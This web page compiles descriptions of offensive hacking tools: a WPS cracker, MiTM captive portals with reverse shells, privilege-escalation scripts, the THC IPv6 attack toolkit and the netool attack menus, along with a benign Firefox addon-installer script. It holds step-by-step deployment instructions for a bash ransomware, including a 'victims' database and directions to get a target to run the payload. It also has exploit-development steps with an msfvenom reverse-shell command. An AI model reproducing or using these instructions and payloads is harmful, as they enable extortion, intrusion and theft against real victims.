High Touch WPS Breaker [HT-WB] is a small tool based on the bash script language, it can help you to extract the wps pin of many vulnerable routers and get the password, in the last i want to notice that HT-WPS Breaker in its process is using these tools : -“Piexiewps” -“Reaver” -“Bully” -“Aircrack-ng” and some commands in automatic way.

High Touch WPS Breaker [HT-WB] Console Banner. This Script has teted on Kali Sana, Arch Linux, Debian, Ubuntu etc..

Download : HT-WPS-Breaker.zip(2.6 MB)  | Clone Url
Source : https://github.com/SilentGhostX

is ARP MiTM Captive Portal.
With main Menu:
1. Captive Portal – Log In Creds / Reverse Shell
2. Captive Portal – Log In Creds / Reverse Shell with DNS Spoof
3. SMB – Hash Grab
4. SMB – Hash Relay
5. Web – Beef Hook
6. Web – SSL Strip and Capture Traffic
7. Web – BDFproxy/BDFfactory
8. Web – Hamster/Ferret

ARP MiTM Captive Portal

Captive Portal – HTA Reverse Shell:
1. Cisco
2. Microsoft Forefront
3. Sophos
4. SQUID
5. TrendMicro
6. Fortigate\Fortinet
7. Flash Updater
8. Forttinet – Old Style
9. Custom

Reverse Shell Menu

Installation:
– git clone https://github.com/CroweCybersecurity/MiTM-CaptivePortal.git
– cd MiTM-CaptivePortal
– chmod +x
– run “./mitm-portal.sh
Thi Script has been tested on Kali-Sana 2.0 Desktop or in VMWare Machine.

Source : https://github.com/CroweCybersecurity

Privilege-Escalation This contains common OSCP local exploits and enumeration collection scripts.
On Linux Folder:
– Post Exploitation Script;
— Linux Privilege Escalation Script Bash.sh
— Linux Privilege Escalation Script Bash.py
— Linux Privilege Escalation Script Bash.pl
– Python <= 2.4.2 realpath() Local Stack Overflow.py

Local Linux Enumeration & Privilege Escalation Script-py

On Windows Folder:
The Sysinternals Troubleshooting Utilities have been rolled up into a single Suite of tools. This file contains the individual troubleshooting tools and help files.
The Suite is a bundling of the following selected Sysinternals Utilities:

AccessChk - AccessChk is a command-line tool for viewing the effective permissions on files, registry keys, services, processes, kernel objects, and more.

AccessEnum - This simple yet powerful security tool shows you who has what access to directories, files and Registry keys on your systems. Use it to find holes in your permissions.

AdExplorer - Active Directory Explorer is an advanced Active Directory (AD) viewer and editor.

AdInsight - An LDAP (Light-weight Directory Access Protocol) real-time monitoring tool aimed at troubleshooting Active Directory client applications.

AdRestore - Undelete Server 2003 Active Directory objects.

Autologon - Bypass password screen during logon.

Autoruns - See what programs are configured to startup automatically when your system boots and you login. Autoruns also shows you the full list of Registry and file locations where applications can configure auto-start settings.

BgInfo - This fully-configurable program automatically generates desktop backgrounds that include important information about the system including IP addresses, computer name, network adapters, and more.

CacheSet - CacheSet is a program that allows you to control the Cache Manager's working set size using functions provided by NT. It's compatible with all versions of NT.

ClockRes - View the resolution of the system clock, which is also the maximum timer resolution.

Contig - Wish you could quickly defragment your frequently used files? Use Contig to optimize individual files, or to create new files that are contiguous.

Coreinfo - Coreinfo is a new command-line utility that shows you the mapping between logical processors and the physical processor, NUMA node, and socket on which they reside, as well as the cache’s assigned to each logical processor.

Ctrl2cap - This is a kernel-mode driver that demonstrates keyboard input filtering just above the keyboard class driver in order to turn caps-locks into control keys. Filtering at this level allows conversion and hiding of keys before NT even "sees" them. Ctrl2cap also shows how to use NtDisplayString() to print messages to the initialization blue-screen.

Download all archive : 

DebugView - Another first from Sysinternals: This program intercepts calls made to DbgPrint by device drivers and OutputDebugString made by Win32 programs. It allows for viewing and recording of debug session output on your local machine or across the Internet without an active debugger.

Desktops - This new utility enables you to create up to four virtual desktops and to use a tray interface or hotkeys to preview what’s on each desktop and easily switch between them.

Disk2vhd - Disk2vhd simplifies the migration of physical systems into virtual machines (p2v).

DiskExt - Display volume disk-mappings.

Diskmon - This utility captures all hard disk activity or acts like a software disk activity light in your system tray.

DiskView - Graphical disk sector utility.

Disk Usage (DU) - View disk usage by directory.

EFSDump - View information for encrypted files.

Handle - This handy command-line utility will show you what files are open by which processes, and much more.

Hex2dec - Convert hex numbers to decimal and vice versa.

Junction - Create Win2K NTFS symbolic links.

LDMDump - Dump the contents of the Logical Disk Manager's on-disk database, which describes the partitioning of Windows 2000 Dynamic disks.

ListDLLs - List all the DLLs that are currently loaded, including where they are loaded and their version numbers. Version 2.0 prints the full path names of loaded modules.

LiveKd - Use Microsoft kernel debuggers to examine a live system.

LoadOrder - See the order in which devices are loaded on your WinNT/2K system.

LogonSessions - List the active logon sessions on a system.

MoveFile - Allows you to schedule move and delete commands for the next reboot.

NTFSInfo - Use NTFSInfo to see detailed information about NTFS volumes, including the size and location of the Master File Table (MFT) and MFT-zone, as well as the sizes of the NTFS meta-data files.

PageDefrag - Defragment your paging files and Registry hives.

PendMoves - Enumerate the list of file rename and delete commands that will be executed the next boot.

PipeList - Displays the named pipes on your system, including the number of maximum instances and active instances for each pipe.

PortMon- Monitor serial and parallel port activity with this advanced monitoring tool. It knows about all standard serial and parallel IOCTLs and even shows you a portion of the data being sent and received. Version 3.x has powerful new UI enhancements and advanced filtering capabilities.

ProcDump - This new command-line utility is aimed at capturing process dumps of otherwise difficult to isolate and reproduce CPU spikes. It also serves as a general process dump creation utility and can also monitor and generate process dumps when a process has a hung window or unhandled exception.

Process Explorer - Find out what files, registry keys and other objects processes have open, which DLLs they have loaded, and more. This uniquely powerful utility will even show you who owns each process.

Process Monitor - Monitor file system, Registry, process, thread and DLL activity in real-time.

ProcFeatures - This applet reports processor and Windows support for Physical Address Extensions and No Execute buffer overflow protection.

PsExec - Execute processes on remote systems.

PsFile - See what files are opened remotely.

PsGetSid - Displays the SID of a computer or a user.

PsInfo - Obtain information about a system.

PsKill - Terminate local or remote processes.

PsList - Show information about processes and threads.

PsLoggedOn - Show users logged on to a system.

PsLogList - Dump event log records.

PsPasswd - Changes account passwords.

PsService - View and control services.

PsShutdown - Shuts down and optionally reboots a computer.

PsSuspend - Suspend and resume processes.

RAMMap - An advanced physical memory usage analysis utility that presents usage information in different ways on its several different tabs.

RegDelNull - Scan for and delete Registry keys that contain embedded null-characters that are otherwise undeleteable by standard Registry-editing tools.

RegJump - Jump to the registry path you specify in Regedit.

RootkitRevealer - Scan your system for rootkit-based malware.

SDelete - Securely overwrite your sensitive files and cleanse your free space of previously deleted files using this DoD-compliant secure delete program.

ShareEnum - Scan file shares on your network and view their security settings to close security holes.

ShellRunas - Launch programs as a different user via a convenient shell context-menu entry.

Sigcheck - Dump file version information and verify that images on your system are digitally signed.

Streams - Reveal NTFS alternate streams.

Strings - Search for ANSI and UNICODE strings in binaryimages.

Sync - Flush cached data to disk.

TCPView - Active socket command-line viewer.

VMMap - VMMap is a process virtual and physical memory analysis utility.

VolumeId - Set Volume ID of FAT or NTFS drives.

Whois - See who owns an Internet address.

WinObj - The ultimate Object Manager namespace viewer is here.

ZoomIt - Presentation utility for zooming and drawing on the screen.

Download : Privileges-Escalation.zip (13.3 MB)  | Clone Url
Source : https://github.com/AusJock

WARNING:
Use this tool at your own risk. Author is not responsible or liable if you damage your own system or others. Follow all local, state, federal, and international laws as it pertains to your geographic location. Do NOT use this tool maliciously as it is being released for educational purposes for use in cyber exercises or demonstrations of adversarial tools.
This POST JUST FOR EDUCATION PURPOSE ONLY! how to run and remove Ransomware on BASH.

Bash Console Message

latest change : Fixed Coding Bugs.
Bash Ransomware is a Simple bash ransomware likes CryptoWall.
Requirements
– openssl
– jquery
– mysql
– php 5 (php5-mysql)

What to do on the server-side:
$ openssl genrsa -out priv.pem 4096
$ openssl rsa -pubout -in priv.pem -out pub.pem
$ cat /dev/urandom | tr -cd ‘A-Za-z0-9’ | fold -w 4096 | head -n 1 > key.bin
$ mkdir -p /var/www/html/downloads
$ cp pub.pem /var/www/html/downloads/
$ cp key.bin /var/www/html/downloads/
> Modify crypto.sh and replace the IPwith your web server’s IP/URL
$ cp crypto.sh /var/www/html/downloads/
> Copy all of the ransomware files to /var/www/html
> You should have all of the php files in the root of your web dir (/var/www/html/)
> You should also have /var/www/html/images/ and /var/www/html/scripts/
$ cd /var/www/html/downloads
$ python -m SimplHTTPServer 8080 &
$ cd ../
> Modify admin.php, admin_query.php, decrypt.php, query.php, and target.php with your database information
> Next, create the database for storing the data
$ mysql -u [user] -p
$ create database victims;
$ use victims;
$ create table target_list (id int(6) unsigned auto_increment primary key, unique_id varchar(16) not null, target_ip varchar(30), curr_time timestamp not null, exp_time timestamp not null, time_expired bool not null);
$ exit

What to do on the client-side
Get target to download the file and execute or if you have have access to the system, download it directly
$ chmod 755 crypto.sh
$ ./crypto.sh &

What it does
– Downloads the public key and key file to the target
– Move DB settings into a common.php file and refer to that file in each of the scripts (One place to edit instead of numerous places)
– Loops through the system and encrypts the various files
– Deletes the key file and leaves the public key
– Prints the ransom message
– Links to web pages where the user can see an active countdown of the time that is left before key deletion

TODO
– Configure script to download over https, more covert
– Add in error handling for non-existing files
– Imporve functionality and capabilities
– Unique key pair per victim (In work)
– Add Screenshots
– Make ransom message on web page prettier

Remove :
cd /etc/cron.hourly/
rm instructions.sh

WARNING:
Use this tool at your own risk. Author is not responsible or liable if you damage your own system or others. Follow all local, state, federal, and international laws as it pertains to your geographic location. Do NOT use this tool maliciously as it is being released for educational purposes for use in cyber exercises or demonstrations of adversarial tools.

Download : bash-ransomware.zip(239 KB)
Source : https://github.com/SubtleScope

Latest Change 10/11/2015 more helper bash scripts:
– dnsrevenum6.sh: scans the reverse DNS entries of the /48 of the ipv6 address on the responsible dns server.
– create_network_map.sh: Creates a GV file for use with Graphviz to create a network topology map file1 must have per line one entry only.
– dnssecwalk.sh: will try dnssecwalk on all nameservers until one is found, or all if -a is given as option.
– trace62list.sh: Prepares a trace6 output file for the network topology map generation tool.
– axfr.sh : data is saved to domain-ns.zone.
– data is saved to $domain-$ns.zone, if there are dns soa problems and the prefix length is not 48 you can specify it as an extra option on the command line.

more helper bash scripts

CHANGELOG
=========
NOTE: More tools exist, but are only handed out to specific people who develop ipv6 security/pentest tools themselves, or support the thc-ipv6 toolkit development. If this matches *you* send me an email to vh (at) thc (dot) org , with “thc-ipv6 antispam” in the subject line.

v2.8-dev:
* TCP Fast Open support (22/06/2015)
* fake_router26:
– option -X removes router entry from targets on exit (patch from Dan Luedtke, thanks)
* flood_router26:
– Fix – the source mac was always null bytes without evasion, thank to Christopher Werny for reporting
* ndpexaust26:
– option -m generates maximum size packets
* dump_router6:
– fixed route option parsing
* thcping6:
– added -O TCP Fast Open cookie request option
* thcsyn6
– added -O TCP Fast Open fake cookie sending option
* connect6:
– will now print the known MTU path to the destination upon succesful connect
* Renamed dos_mld.sh to dos_mld6.sh and local_discovery.sh to local_discovery6.sh

INTRODUCTION
============
This code was inspired when I got into touch with IPv6, learned more and more about it – and then found no tools to play (read: “hack”) around with. First I tried to implement things with libnet, but then found out that the IPv6 implementation is only partial – and sucks. I tried to add the missing code, but well, it was not so easy, hence I saved my time and quickly wrote my own library.

LIMITATIONS
===========
This code currently only runs on:
– Linux 2.6.x or newer (because of /proc usage)
– Ethernet
But this means for all linux guys that it will work for 98% of your use cases.
Patches are welcome! (add “antispam” in the subject line to get through my
anti-spam protection, otherwise the email will bounce)

THE TOOLS
=========
The THC IPV6 ATTACK TOOLKIT comes already with lots of effective attacking tools:
– parasite6: ICMPv6 neighbor solitication/advertisement spoofer, puts you as man-in-the-middle, same as ARP mitm (and parasite)
– alive6: an effective alive scanng, which will detect all systems listening to this address
– dnsdict6: parallized DNS IPv6 dictionary bruteforcer
– fake_router6: announce yourself as a router on the network, with the highest priority
– redir6: redirect traffic to you intelligently (man-in-the-middle) with a clever ICMPv6 redirect spoofer
– toobig6: mtu decreaser with the same intelligence as redir6
– detect-new-ip6: detect new IPv6 devices which join the network, you can run a script to automatically scan these systems etc.
– dos-new-ip6: detect new IPv6 devices and tell them that their chosen IP collides on the network (DOS).
– trace6: very fast traceroute6 with supports ICMP6 echo request and TCP-SYN
– flood_router6: flood a target with random router advertisements
– flood_advertise6: flood a target with random neighbor advertisements
– fuzz_ip6: fuzzer for IPv6
– implementation6: performs various implementation checks on IPv6
– implementation6d: listen daemon for implementation6 to check behind a FW
– fake_mld6: announce yourself in a multicast group of your choice on the net
– fake_mld26: same but for MLDv2
– fake_mldrouter6: fake MLD router messages
– fake_mipv6: steal a mobile IP to yours if IPSEC is not needed for authentication
– fake_advertiser6: announce yourself on the network
– smurf6: local smurfer
– rsmurf6: remote smurfer, known to work only against linux at the moment
– exploit6: known IPv6 vulnerabilities to test against a target
– denial6: a collection of denial-of-service tests againsts a target
– thcping6: sends a hand crafted ping6 packet
– sendpees6: a tool by willdamn@gmail.com, which generates a neighbor
solicitation requests with a lot of CGAs (crypto stuff to keep the
CPU busy. nice.
and about 25 more tools for you to discover

Just run the tools without options and they will give you help and show the
command line options.
DETECTION
=========
Most tools can easily be detected by an IDS or specialized detection software. This is done on purpose to make rogue usage detection easier. The tools either specify a fixed packet signature, or generically sniff for packets (e.g. therefore also answering to ICMPv6 neighbor solitications which
are sent to a non-existing mac, and are therefore very easy to detect).

Installation :
– git clone https://github.com/vanhauser-thc/thc-ipv6
– cd thc-ipv6
– ./thc-ipv6-setup.sh
– or run bash script helper

Download : thc-ipv6.zip(1.58 MB)  | Clone Url
Source : www.thc.org | vh@thc.org | Our Post Before

reed is a Reverse Engineering and Exploit Development stuff.
Latest Change 10/12/2015: Add shellcode execution frames in C#

Inside Folder :
– mans
– templates
– tools

sc2bin : Tool for building binaries containing the supplied shellcode for testing purposes.

List Of Tools:
+ sc2bin : Tool for building binaries containing the supplied shellcode for testing purposes.
+ scdisas: Tool for disassembling shellcode string.
+ scdump : Tool for dumping shellcode string from instructions of the .text (code) section of the given binary.
+ str4sc : Tool for converting string to instructions for pushing them to stack.
+ xorencoder : Tool for xoring shellcode with a given key (can be one or multiple bytes).

Exploit Development Step:
1. Fuzz it and have it crash with all A’s

2. Take control of EIP and one other register (ESP, EAX, etc.)
a. Use pattern_create $buffersize and pattern_offset $register_value

3. Find badchars
a. !mona bytearray -b “\x00” or use own Python algo (even better)

4. Generate the shellcode and insert it into the script
a. Remember to generate the shellcode excluding the bad chars! Example:
msfvenom -f python -b ‘\x00’ -p windows/shell_reverse_tcp LHOST=192.168.40.47 LPORT=443 EXITFUNC=thread > revshellwin.py
b. Remember to add at least 16 nops in front of the shellcode or it won’t work!

5. Find space for the shellcode
a. Try increasing buffer in necessary

6. Find instruction that will change the execution flow, e.g. JMP ESP / JMP EAX:
a. Use nasm_shell to obtain intrcution opcodes
b. First find module without ASLR and possible DEP protections:
!mona modules
c. Second find the instruction inside unprotected module, e.g.
!mona find -s “\xff\xe4” -m VulnServer.exe
d. Remember that the instruction address must not contain any bad chars!
e. Remember to revert the address in your code! E.g. 0x65d11d71 becomes “\x71\x1d\xd1\x65”

f. In more complex case when you control ESP but don’t have enough space and some other register (e.g. EAX)
doesn’t point exactly at the beginning of the controllable input you can write
add eax, $offset
jmp eax
instructions into ESP, and then put your shellcode into EAX+$offset

7. Test it.

Installation :
– git clone https://github.com/reider-roque/reed
– cd reed
– just run ./ at tool folder

Source: https://github.com/reider-roque

DISCLAIMER:
The author does not hold any responsibility about the bad use of this script remember that attacking targets without prior concent its ilegal and punish by law, this script as build to show how msf resource files can automated tasks.

Scanning WAN networks In search of targets may take 10 to 15 minutes depending of your network connection, and will search In 1024 random hosts For the selected service/port, also the File ‘brute.txt’ may be edited to insert new entrys, or we can provide the full path to another dicionary File to be used In brute-forcing services.

Adictionals tool settings can be configurated just by editing ‘settings’ file (nano settings) befor running the tool, settings like: use decoys (scanning WAN networks) OR spoof mac addr (change mac addr and ip addr), can only be config befor running the tool.

rc-exploiter-v1.1.6

Features:
1º – scan in WAN for selected port (service) open
2º – port hosts found to msf database and set global variables (msfdb.rc)
3º – runs the conrrespondent exploit.rc (ssl.rc) againts all RHOSTS set before.
work flow:
1º this script will ask (to the attacker) to input the port number to search
2º then uses nmap to search in WAN networks for the specified port open
3º builds a resource file (.rc) to port the targets found to msf database
4º starts msf db and lunch the correspondente exploit.rc file againts all targets

Note:
“all ‘exploits.rc’ will use nmap nse script engine and msf auxiliary modules to exploit the target And each discovered matching login and password will create a Metasploit session”.

install:
git clone git://git.code.sf.net/p/rcexploiter/RC-exploiter RC-exploiter
cd RC-exploiter && chmod +x *.sh
sudo ./rc-exploiter.sh

Source : http://sourceforge.net/projects/rcexploiter

Changelog v-4.5 .2:
+ UPGRADE => msfcli replaced by msfconsole
+ netool.sh => “added” file selection GUI -> zenity displays
+ priv8.sh => “added” MitM DLINK phishing -> capture routers creds
+ priv8.sh => “added” adobe_flash_hacking_team_uaf -> mitm+dns_spoof
+ INSTALL.sh => “added” build shortcut to toolkit -> gnome-desktop-item-edit
* netool.sh => “improved” input interface in use bug-fixed -> ettercap modules
* priv8.sh => “bug-fixed” ettercap IPV6 bug-fixed -> target selection /// ///
* priv8.sh => “improved” java.jar phishing -> download using pishishing webpage or direct URL execute…

Scanning – Sniffing – Social Engeneering”

Netool: its a toolkit written using ‘bash, python, ruby’ that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. this toolkit makes it easy tasks such as SNIFFING tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, D0S attacks in wan/lan networks, TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of target webbrowser surfing (driftnet) also uses macchanger to decoy scans changing the mac address.

Rootsector: module allows you to automate some attacks over DNS_SPOOF + MitM(phishing – social engineering) using metasploit, apache2 and ettercap frameworks. like the generation of payloads,shellcode,backdoors delivered using dns_spoof and MitM method to redirect a target to your phishing webpage.

Recently was introduced “inurlbr” webscanner (by cleiton) that allow us to search SQL related bugs, using severeal search engines, also this framework can be used in conjunction with other frameworks like nmap, (using the flag –comand-vul)

Installation:

git clone git://git.code.sf.net/p/netoolsh/opensource-kali opensource
cd opensource
chmod +x INSTALL.sh
./INSTALL.sh

Update type: u

Example: 

inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27
-s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

Operative Systems Supported:
Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS | Linux-backtrack (un-continued) | Mac osx (un-continued).

“TOOLKIT DEPENDENCIES”
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip

“SCANNER INURLBR.php”
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

Features (Modules) :

"1-Show Local Connections"
  "2-Nmap Scanner menu"
        ->
        Ping target
        Show my Ip address
        See/change mac address
        change my PC hostname
        Scan Local network 
        Scan external lan for hosts
        Scan a list of targets (list.txt)          
        Scan remote host for vulns          
        Execute Nmap command
        Search for target geolocation
        ping of dead (DoS)
        Norse (cyber attacks map)
        nmap Nse vuln modules
        nmap Nse discovery modules
        <-
  "3-Open router config"       
  "4-Ip tracer whois"
  "5-firefox webcrawler addon"                           
  "6-Retrieve metadata"
        ->
        retrieve metadata from target website
        retrieve using a fake user-agent
        retrieve only certain file types
        <-
  "7-INURLBR.php (webcrawler)"
        -> 
        scanner inurlbr.php -> Advanced search with multiple engines, provided
        analysis enables to exploit GET/POST capturing emails/urls & internal
        custom validation for each target/url found. also the ability to use
        external frameworks in conjuction with the scanner like nmap,sqlmap,etc
        or simple the use of external scripts.
        <-
  "8-r00tsect0r automated exploits (phishing - social engeneering)"
        ->
        package.deb backdoor [Binary linux trojan]
        Backdooring EXE Files [Backdooring EXE Files]
        fakeupdate.exe [dns-spoof phishing backdoor]
        meterpreter powershell invocation payload [by ReL1K]
        host a file attack [dns_spoof+mitm-hosted file]
        clone website [dns-spoof phishing keylooger]
        Java.jar phishing [dns-spoof+java.jar+phishing]
        clone website [dns-spoof + java-applet]
        clone website [browser_autopwn phishing Iframe]
        Block network access [dns-spoof]
        Samsung TV DoS [Plasma TV DoS attack]
        RDP DoS attack [Dos attack against target RDP]
        website D0S flood [Dos attack using syn packets]
        firefox_xpi_bootstarpped_addon automated exploit
        PDF backdoor [insert a payload into a PDF file]
        Winrar backdoor (file spoofing)
        VBScript injection [embedded a payload into a world document]
        ".::[ normal payloads ]::."
        windows.exe payload
        mac osx payload
        linux payload
        java signed applet [multi-operative systems]
        android-meterpreter [android smartphone payload]
        webshell.php [webshell.php backdoor]
        generate shellcode [C,Perl,Ruby,Python,exe,war,vbs,Dll,js]
        Session hijacking [cookie hijacking]
        start a lisenner [multi-handler]
        <-
  "9-Config ettercap"         
  "10-Launch MitM"            
  "11-Show URLs visited"       
  "12-Sniff remote pics"
  "13-Sniff SSL passwords"      
  "14-Dns-Spoofing"
  "15-Share files on lan"   
  "16-DoS attack {local}"      
  "17-Compile etter.filters"    
  "18-execute ettercap filter"
  "19-Common user password profiler [cupp.py]"

  d. delete lock folders
  a. about netool
  u. check for updates
  c. config toolkit
 db. access database
  q. quit

Download :
opensource.tar.gz (26.5 MB)
opensource[kali].tar.gz (26.5 MB)
Our Post Before  | Source : http://sourceforge.net/projects/netoolsh/

How?
It downloads the most important extensions, and install it on your browser. The used extensions has been chosen by a survey among the information security community. Based on it’s results, Firefox Security Toolkit was made. Also, it allows you to download Burp Suite certificate and a large user-agent list for User-Agent Switcher. Making it one-click away to prepare your web-application testing browser.

Firefox Security Toolkit

How does it differs from well-known projects, such as OWASP Mantra and Hcon STF?
OWASP Mantra and Hcon STF are not regularly updated, and needs a lot of work in order to develop and maintain. Meanwhile, Firefox Security Toolkit does not need a additional maintaining, although I would be maintaining it for any issues/bugs if needed. The used extensions are downloaded from Mozilla Addons Store with its latest version, to ensure the best testing experience for the penetration tester.

How can use Firefox Security Toolkit?
Web-Application Penetration Testers, Information Security Learners, and basically anyone interested in web-application security.

Browser Toolbar

Compatibility:
The project currently supports Linux/Unix environments.

Usage:
bash ./firefox_security_toolkit.sh

Available Addons:
– Cookie Export/Import
– Cookie Manager
– Copy as Plain Text
– Crypto Fox
– CSRF-Finder
– FireBug
– Fireforce
– FlagFox
– Foxy Proxy
– HackBar
– Live HTTP Headers
– Multi Fox
– PassiveRecon
– Right-Click XSS
– Tamper Data
– User Agent Switcher
– Wappalyzer
– Web Developer

Additional Features:-
+ Downloading Burp Suite Certificate
+ Downloading a large user-agent list for User-Agent Swithcer

Script:

#!/bin/bash
##################################################################################
##Firefox Security Kit
###Description:
#This script automatically transform Firefox Browser to a penetration testing suite. The script mainly focuses on downloading the required addons for web-application penetration testing.
###Version:
#v0.2
###Author:
#Mazin Ahmed <mazin AT mazinahmed DOT net>
###################################################################################
logo() { 
echo '    ______ _              ____                _____                           _  __            ______               __ __ __  _  __ '
echo '   / ____/(_)_____ ___   / __/____   _  __   / ___/ ___   _____ __  __ _____ (_)/ /_ __  __   /_  __/____   ____   / // //_/ (_)/ /_'
echo '  / /_   / // ___// _ \ / /_ / __ \ | |/_/   \__ \ / _ \ / ___// / / // ___// // __// / / /    / /  / __ \ / __ \ / // ,<   / // __/'
echo ' / __/  / // /   /  __// __// /_/ /_>  <    ___/ //  __// /__ / /_/ // /   / // /_ / /_/ /    / /  / /_/ // /_/ // // /| | / // /_  '
echo '/_/    /_//_/    \___//_/   \____//_/|_|   /____/ \___/ \___/ \__,_//_/   /_/ \__/ \__, /    /_/   \____/ \____//_//_/ |_|/_/ \__/  '
echo '                                                                                  /____/                                            '
echo -e "  _               __  __           _            _    _                        _  "
echo -e " | |__  _   _ _  |  \/  | __ _ ___(_)_ __      / \  | |__  _ __ ___   ___  __| | "
echo -e " | '_ \| | | (_) | |\/| |/ _` |_  / | '_ \    / _ \ | '_ \| '_ ` _ \ / _ \/ _` | "
echo -e " | |_) | |_| |_  | |  | | (_| |/ /| | | | |  / ___ \| | | | | | | | |  __/ (_| | "
echo -e " |_.__/ \__, (_) |_|  |_|\__,_/___|_|_| |_| /_/   \_\_| |_|_| |_| |_|\___|\__,_| "
echo -e "        |___/                                                                    "
echo -e "v0.1"
echo -e "\t\t\t\t\twww.mazinahmed.net"
echo -e "\t\t\t\t\ttwitter.com/mazen160"
echo -e "\t\t\t\t\tae.linkedin.com/pub/mazin-ahmed/86/795/629"
echo -e "\n\n"
}

logo

welcome() {
echo -e "\n\n"
echo -e "Usage:\n\t bash $0 run\n\n"
echo -e '[%%]Available Addons:'	
echo '#Cookie Export/Import
#Cookie Manager 
#Copy as Plain Text
#Crypto Fox
#CSRF-Finder
#FireBug
#Fireforce
#FlagFox
#Foxy Proxy
#HackBar
#Live HTTP Headers
#Multi Fox
#PassiveRecon
#Right-Click XSS
#Tamper Data
#User Agent Switcher
#Wappalyzer
#Web Developer
'
echo -e '[%%]Additions Features:'
echo -e '#Downloading Burp Suite Certificate'
echo -e '#Downloading a large user-agent list for User-Agent Swithcer'
echo -e "\n\n"
echo "[$] legal disclaimer: Usage of Firefox Security Toolkit for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program"

}

if [[ $1 != 'run' ]];then
	welcome
	exit
fi

burp_cert() {
	wget 'http://127.0.0.1:8080/cert' -o /dev/null -O "$scriptpath/cacert.der" ; if [ -s "$scriptpath/cacert.der" ] ; then echo -e "[*] Burp Suite certificate has been downloaded, and can be found at [$scriptpath/cacert.der]."; else echo "[!]Error: Firefox Security Toolkit was not able to download Burp Suite certificate, you need to do this task manually." ; fi
}
	
##Checking whether Firefox is installed.
if ! [ -f /usr/bin/firefox ]; then
echo -e "[*]Firefox does not seem to be installed.\n[*]Quitting..."
exit
fi


echo -en "[#]Click [Enter] to start. "; read -r

##Creating a tmp directory.
scriptpath=$(mktemp -d)
echo -e "[*]Created a tmp directory at [$scriptpath]."

##Inserting the "Installation is Finished page" into $scriptpath
echo '<!DOCTYPE HTML><html><center><head><h1>Installation is Finished</h1></head><body><p><h2>You can close Firefox.</h2><h3><i>Firefox Security Toolkit</i></h3></p></body></center></html>' > "$scriptpath/.installation_finished.html"


##Ask about whether the user would like to download Burpsuite Certificate.
echo -n "[@]Would you like to download Burp Suite Certificate? [y/n]. Note that Burp Suite should be running in your machine. "; read -r burp_cert_answer
	if [[ $burp_cert_answer == 'y' ]];then
		burp_cert
	fi
	
####Downloading packages.
echo -e "[*]Downloading Addons."

#Copy as Plain Text
wget "https://addons.mozilla.org/firefox/downloads/latest/copy-as-plain-text/addon-344925-latest.xpi" -o /dev/null -O "$scriptpath/copy_as_plain_text.xpi"

#Web Developer
wget "https://addons.mozilla.org/firefox/downloads/latest/web-developer/addon-60-latest.xpi" -o /dev/null -O "$scriptpath/web_developer.xpi"

#Tamper Data
wget "https://addons.mozilla.org/firefox/downloads/latest/tamper-data/addon-966-latest.xpi" -o /dev/null -O "$scriptpath/tamper_data.xpi"

#User Agent Switcher
wget "https://addons.mozilla.org/firefox/downloads/latest/user-agent-switcher/addon-59-latest.xpi" -o /dev/null -O "$scriptpath/user_agent_switcher.xpi"

#Right-Click XSS
wget "https://addons.mozilla.org/firefox/downloads/file/215802/rightclickxss-0.2.1-fx.xpi" -o /dev/null -O "$scriptpath/right_click_xss.xpi"

#Foxy Proxy
wget "https://addons.mozilla.org/firefox/downloads/file/319162/foxyproxy_standard-4.5.5-sm+tb+fx.xpi" -o /dev/null -O "$scriptpath/foxy_proxy.xpi"

#HackBar
wget "https://addons.mozilla.org/firefox/downloads/latest/3899/addon-3899-latest.xpi" -o /dev/null -O "$scriptpath/hackbar.xpi"

#Wappalyzer
wget "https://addons.mozilla.org/firefox/downloads/latest/wappalyzer/addon-10229-latest.xpi" -o /dev/null -O "$scriptpath/wappalyzer.xpi"

#PassiveRecon
wget "https://addons.mozilla.org/firefox/downloads/latest/6196/addon-6196-latest.xpi" -o /dev/null -O "$scriptpath/passiverecon.xpi"

#Cookie Manager+
wget "https://addons.mozilla.org/firefox/downloads/latest/92079/addon-92079-latest.xpi" -o /dev/null -O "$scriptpath/cookiemanager+.xpi"

#Cookie Export/Import
wget "https://addons.mozilla.org/firefox/downloads/latest/344927/addon-344927-latest.xpi" -o /dev/null -O "$scriptpath/cookie_export_import.xpi"

#FlagFox
wget "https://addons.mozilla.org/firefox/downloads/latest/5791/addon-5791-latest.xpi" -o /dev/null -O "$scriptpath/flagfox.xpi"

#Fireforce
wget "https://addons.mozilla.org/firefox/downloads/file/204186/fireforce-2.2-fx.xpi" -o /dev/null -O "$scriptpath/fireforce.xpi"

#CSRF-Finder
wget "https://addons.mozilla.org/firefox/downloads/file/224182/csrf_finder-1.2-fx.xpi" -o /dev/null -O "$scriptpath/csrf_finder.xpi"

#Multi Fox
wget "https://addons.mozilla.org/firefox/downloads/latest/200283/addon-200283-latest.xpi" -o /dev/null -O "$scriptpath/multifox.xpi"

#FireBug
wget "https://addons.mozilla.org/firefox/downloads/latest/1843/addon-1843-latest.xpi" -o /dev/null -O "$scriptpath/firebug.xpi"

#Live HTTP Headers
wget "https://addons.mozilla.org/firefox/downloads/file/345004/live_http_headers_fixed_by_danyialshahid-0.17.1-signed-sm+fx.xpi" -o /dev/null -O "$scriptpath/live_http_headers.xpi"

#Crypto Fox
wget "https://addons.mozilla.org/firefox/downloads/file/140447/cryptofox-2.2-fx.xpi" -o /dev/null  -O "$scriptpath/crypto_fox.xpi" 

###Ask about whether to download user-agent list for User-Agent Switcher addon
echo -n "[@]Would you like to download user-agent list for User-Agent Switcher Addon? [y/n]"; read -r useragent_list_answer
 if [[ $useragent_list_answer == 'y' ]];then
	wget 'http://techpatterns.com/downloads/firefox/useragentswitcher.xml' -o /dev/null -O "$scriptpath/useragentswitcher.xml" ; echo -e "[*]Additional User-Agnets has been downloaded for Default User-Agent Addon, you can import it manually. It can be found at: [$scriptpath/useragentswitcher.xml]."
	fi


####Messages.
echo -e "[*]Downloading addons has been finished.\n";
echo -en "[**]Click [Enter] to run Firefox to finish the task. "; read -r
